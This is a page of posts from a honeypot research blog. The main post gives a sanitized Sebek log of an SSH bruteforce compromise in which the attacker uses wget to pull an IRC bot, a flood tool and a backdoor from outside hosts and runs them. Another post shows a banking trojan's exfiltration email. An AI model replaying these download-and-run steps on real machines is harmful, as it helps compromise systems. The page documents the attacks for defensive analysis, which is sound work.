Honeypot Compromise: SSH Bruteforcing

Monday, October 30. 2006
About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48	w

12:12:50	uname -a

12:12:54	passwd

12:12:43	w

12:12:53	ls

12:12:54	cd /tmp

12:12:55	ls

12:12:57	cd /var/tmp

12:12:57	ls

12:12:08	wget http://www.members.lycos.co.uk/XXX/mech.tar

12:12:15	wget http://free.7host06.com/XXX/linuxteam.tar.gz

12:12:29	wget http://free.7host06.com/XXX/flood

12:12:00	ls

12:12:04	tar zxvf mech.tar

12:12:06	cd mech

12:12:06	ls

12:12:10	pico mech1.users

12:12:12	nano mech1.users

12:12:16	mcedit mech1.users

12:12:19	vi mech1.users

[...]

12:12:07	vi kswap.set

[...]

12:12:28	./inetd
Posted by Thorsten Holz in honeynets at 19:52 | Comments (2) | Trackbacks (0)

New contributor: David Watson

Monday, October 30. 2006
In the future, I will not be the only one who blogs on honeyblog.org. David Watson from the UK Honeynet Project will join me and blog about stories related to honeypots and honeynets.
Posted by Thorsten Holz in administrativa at 17:43 | Comments (0) | Trackbacks (0)

SecurityFocus: "Viruses, Phishing, and Trojans For Profit"

Thursday, October 26. 2006
Kelly Martin from SecurityFocus published a nice article regarding the economic aspects of the underground: "Viruses, Phishing, and Trojans For Profit" is definitely an interesting read with links to many other articles. And I'm now off to start my YouTube :-)
Posted by Thorsten Holz in paper at 12:11 | Comments (0) | Trackbacks (0)

Nepenthes and CWSandbox

Monday, October 23. 2006
It is also possible to use nepenthes together with CWSandbox: just change in the file submit-norman.cpp the line containing the option CURLOPT_URL (line 174) from "http://sandbox.norman.no/live_4.html" to "http://luigi.informatik.uni-mannheim.de/submit.php?action=verify". All files are then sent to CWSandbox and you will receive the reports in your inbox.

The latest SVN version of nepenthes is able to submit binaries to Norman and CWSandbox, just take a look at changeset 674.
Posted by Thorsten Holz in honeynets at 20:30 | Comments (0) | Trackbacks (0)

CWSandbox vs. Spy.Banker

Friday, October 20. 2006
From time to time we also get malware binaries that behave like a Trojan. This is an example of a Spy.Banker (named by ClamAV), which tries to steal confidential financial information from the compromised machines. The malware uses SMTP to send information back to the attacker. The following mail is sent to the attacker and contains information about the compromised machine:

From: "!Mensagem [Cartao]!" 

Subject: FOO [Infectado por fataL]

To: xtinfecs@gmail.com

Date: Thu, 5 Oct 2006 01:15:26 +0200

X-Priority: 1

X-Library: Indy 9.00.10



!============fataL CorP============!

!Maquina?: FOO!

!Vítima LOGADA: !

!IP: 123.456.789.abc!

!Data de Abertura: 05.10.2006 Hora de Abertura: 01:15:24_

!Sistema?: Microsoft Windows XP (version 5.1)!

!Endereço da Placa: 00-AB-CD-EF-GH-00!

!============fataL CorP============!


The sandbox can also extract this kind of information since it parses the winsock communication and tries to extract information about different protocols. In addition to SMTP, CWSandbox is currently also capable of understanding IRC, HTTP, and FTP. The complete report is also available as HTML analysis and XML analysis.

Continue reading "CWSandbox vs. Spy.Banker"

Posted by Thorsten Holz in malware at 10:02 | Comments (0) | Trackbacks (0)
(Page 1 of 2, totaling 9 entries) » next page